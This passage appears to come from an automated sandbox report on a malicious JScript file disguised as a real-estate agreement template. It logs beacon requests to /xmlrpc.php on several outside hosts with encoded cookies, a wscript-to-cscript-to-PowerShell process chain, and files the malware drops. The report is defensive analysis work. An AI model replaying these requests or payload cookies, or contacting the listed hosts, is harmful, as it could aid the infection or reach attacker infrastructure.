1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: naturalanimals.netConnection: Close
Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm8TsZPNttDHKsngyDE9u9XdGqLup41gdU9wTPtIo+pzM/Mc/j8qio+He7y0w843NGKPzDaSSvwNCyFLxjrZH1f16yXgN8y1dUv9/VpJo0BAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: weissenbach-pr.deConnection: Close
Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm8TsZPNttDHKsngyDE9u9XdGqLup41gdU9wTPtIo+pzM/Mc/j8qio+He7y0w843NGKPzDaSSvwNCyFLxjrZH1f16yXgN8y1dUv9/VpJo0BAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: memar98.comConnection: Close
Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close
Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close

Source: global traffic	DNS traffic detected: DNS query: naturalanimals.net
Source: global traffic	DNS traffic detected: DNS query: weissenbach-pr.de
Source: global traffic	DNS traffic detected: DNS query: memar98.com
Source: global traffic	DNS traffic detected: DNS query: tennoji-law-uranai.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 06 May 2024 16:41:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: closeVary: Accept-Encoding

Source: real estate co ownership agreement template 43632.js	String found in binary or memory: http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: http://paulirish.com/2011/requestanimationframe-for-smart-animating/
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: http://peltiertech.com/how-excel-calculates-automatic-chart-axis-limits/
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: http://raphaeljs.com/analytics.js)
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: http://stackoverflow.com/questions/1573053/javascript-function-to-convert-color-names-to-hex-codes
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: http://www.cs.rit.edu/~ncs/color/t_convert.html
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: http://www.w3schools.com/HTML/html_colornames.asp
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: http://www.w3schools.com/svg/svg_path.asp
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/d
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: https://github.com/miguelmota/base64toblob/blob/master/base64toblob.js
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: https://github.com/nhn/tui.chart
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: https://github.com/nhn/tui.chart/issues/56)
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: https://i-msdn.sec.s-msft.com/dynimg/IC267997.gif
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: https://www.google-analytics.com/collect
Source: real estate co ownership agreement template 43632.js	String found in binary or memory: https://www.win.tue.nl/~vanwijk/stm.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 91.198.66.211:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.3.78:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.28.10.122:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49711 version: TLS 1.2

System Summary

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 49%

Source: real estate co ownership agreement template 43632.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal92.troj.expl.evad.winJS@13/9@4/4

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\com.adobe.dunamis\Golf Club Repair.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fffj2uvs.1yt.ps1

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE DEVELO~1.JS
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE DEVELO~1.JS
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: jscript.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
